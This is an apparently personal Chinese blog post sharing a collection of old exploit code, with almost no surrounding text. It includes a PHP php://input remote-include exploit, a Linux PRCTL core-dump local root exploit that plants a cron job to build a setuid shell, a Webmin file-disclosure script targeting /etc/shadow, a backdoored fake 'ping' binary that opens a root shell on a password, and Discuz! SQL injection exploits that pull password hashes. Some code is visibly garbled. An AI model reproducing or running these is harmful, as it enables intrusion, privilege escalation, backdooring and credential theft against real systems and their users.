小东西

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:

<?php
/*

PHP include file exploit
* Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
* Date: Jun 24th 2006

/

function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}

if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}

$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>

<style>
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
font-family: "Verdana";
font-size: "10px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "2px solid #666666";
}
</style>

<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<form action="" method="post" >
target server : <br>
<input type="text" name="server" value="<?=$server?>"><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value="<?=$file?>"><br>
add "%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between &lt;? .. ?&gt; tags):<br>
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>

<?php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
echo $resp;
}
?>

/*****************************************************/
/ Local r00t Exploit for: /
/ Linux Kernel PRCTL Core Dump Handling /
/ Modified by wofeiwo 13.Jul.2006 /
/------------------------------------------------------/
/ Based on: /
/------------------------------------------------------/
/ By: /
/ - dreyer <luna@aditel.org> (main PoC code) /
/ - RoMaNSoFt <roman@rs-labs.com> (local root code) /
/ [ 10.Jul.2006 ] /
/****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root echo -e </span>"#include <stdio.h>\nint main(){\nsetuid(0);setgid(0);setreuid(0);system(\"/bin/sh\");return 0;\n}\n" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("Last modified By: wofeiwo (chage shellcode)\n");
printf("Last edited: [ 13.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute ( please wait )\n");
sleep(63);

printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
system("/tmp/fakesh");
return 0;
}

#!/usr/bin/python
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006

import sys, urllib, os

def usage (name):
print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)

def main ():
if len(sys.argv) != 3:
(filepath, filename) = os.path.split(sys.argv[0])
usage(filename)
sys.exit(-1)
else:
target = sys.argv[1] + "unauthenticated" + "/..%01"61 + "/" + sys.argv[2]
sock = urllib.urlopen(target)
getfile = sock.read()
sock.close()
print getfile

if __name__ == "__main__": main()

#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

#define PWD "wofeiwo"

/ init the daemon, if success return 0 other <0 /
int daemon_init()
{
struct sigaction act;
int i, maxfd;

if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);

act.sa_handler = SIG_IGN;
/act.sa_mask = 0;/
act.sa_flags = 0;

sigaction(SIGHUP, &act, 0);

if(fork() != 0) exit(0);

chdir("/");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i<maxfd; i++)
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}

int main(int argc, char argv[])
{
int i,j=0;
char argv_execv[52][128];
char usage[]=
"Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
" [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
" [-M mtu discovery hint] [-S sndbuf]\n"
" [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

if (argc == 1) printf("%s", usage);
if (argc > 1)
{
if (strcmp(PWD, argv[1]) == 0)
{
signal(SIGCHLD, sig_chid);
daemon_init();
seteuid(0);
setuid(0);
setgid(0);
system("/bin/bash");
return 1;
}
else
{
for (i = argc; i > 0; i--)
{
strcpy(argv_execv[j],argv[j]);
j++;
}
strcpy(argv_execv[j], "\0");
execv("/bin/ping", argv);
return 1;
}
}
return 0;
}

/*

Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006

/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

#define PASSLEN 32


char HMod[] = { "GET","POST"};
char HttpVer[] = { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] = { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /"};
char HAcceptLg[] = { "Accept-Language:"," zh-cn"};
char HContentTp[]= { "Content-Type:"," application/x-www-form-urlencoded"};
char HAcceptEn[] = { "Accept-Encoding:"," gzip, deflate"};
char HUserAgent[]= { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char HReferer[]= { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char HHost[]= { "Host: "};
char HContentLg[]= { "Content-Length:"," 189"};
char HContion[]= { "Connection:"," Keep-Alive"};
char HCacheCtr[]= { "Cache-Control:"," no-cache"};
char HXForwardedFor[]= { "X-Forwarded-For:"};
char HCookie[]= { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char HPost[]= { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];

char temp1[1024],temp2[10240] = {0};


int sanddata(char host, int port, char path, char uid, int ascii, int chrnum)
{
WSADATA WSAData={0};
struct hostent he;
struct sockaddr_in ServerAddr={0};
SOCKET Socket=0;
int ren = 0;
char p = NULL;

if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

if((he = gethostbyname(host)) == 0)
{
fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
exit(-1);
}

Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);


ServerAddr.sin_family = AF_INET;
ServerAddr.sin_addr = ((struct in_addr )he->h_addr);
ServerAddr.sin_port = htons(port);

memset(temp1,0,1024);
sprintf(querystring, query, uid, chrnum, ascii);
sprintf(temp1, "%s %s%s %s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"\r\n"
"%s\r\n"
"\r\n\r\n"
,
HMod[1],path,"logging.php?action=login",HttpVer[1],
HAccept[0],HAccept[1],
HAcceptLg[0],HAcceptLg[1],
HContentTp[0],HContentTp[1],
HAcceptEn[0],HAcceptEn[1],
HUserAgent[0],HUserAgent[1],
HReferer[0],HReferer[1],
HHost[0],host,
HContentLg[0]," 0",
HContion[0],HContion[1],
HCacheCtr[0],HCacheCtr[1],
HXForwardedFor[0],querystring,
HCookie[0],HCookie[1],
HPost[0]
);
if (chrnum == 1) printf("\r\n%s\r\n",temp1);

connect(Socket,(SOCKADDR )&ServerAddr,sizeof(ServerAddr));

send(Socket,temp1,strlen(temp1),0);
//sleep(1);
while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

if (chrnum == 1) printf("\r\n%s\r\n",temp2);
if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
{
fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
exit(1);
}
if((p = strstr(temp2, "ip3")) == NULL)
{
close(Socket);
return ascii;
}

close(Socket);
return 0;
}

int main(int argc,char argv[])
{
int i = 0,j = 0,ret = 0;

fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

if(argc != 5)
{
fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
exit(1);
}

fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
fprintf(stdout, "[+] Trying ..\r\n");
fprintf(stdout, "[+] Plz wait a monment ..\r\n");
fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

for(j = 1; j <= PASSLEN; j++)
{
for(i = 48; i < 58; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
for(i = 98; i < 123; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
finded: ret = 0;
}

fprintf(stdout, "\r\n");
fprintf(stdout, "[+] Finished\r\n");

return 0;
}

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
def __init__ (self, threadname, url, u):
self.realurl = url
self.realu = u
threading.Thread.__init__(self, name = threadname)

def run (self):
lenth = 32
injection(lenth, self.realurl, self.realu, self.getName())

def injection (lenthofpass, realurl, path, num):

ran = range(97, 123)
for a in range(48, 58): ran.append(a)

for i in ran:

query = '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /'
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST", path + "logging.php?action=login&",data , header)
sleep(1)
response = http.getresponse()
re1 = response.read()
if re1.find('SELECT') == -1:
print '[-] Unvalnerable host'
print '[-] Exit..'
sys.exit(1);

elif re1.find('ip3') == -1:
password[int(num)] = chr(i)
#print '[+] password ' + num + ': ' + chr(i)
http.close()
sleep(1)
break
#print re1
#print '-----------------------------------------------'
http.close()
sleep(1)

def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

if len(sys.argv) == 3:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)

print '[+] Connect %s' % url[1]
print '[+] Begin threads'
print '[+] Plz wait a long long time'

for a in range(1,33) :
thread = creatthread(str(a), url, u)
thread.start()

while threading.activeCount() != 1:
continue
else:
sys.stdout.write( '[+] The uid=' + sys.argv[2] + ' password hash is: ' )
for n in range(1, 33) :
sys.stdout.write(password[n])
sys.stdout.write('\n[+] Finished \n')


if __name__ == '__main__': main()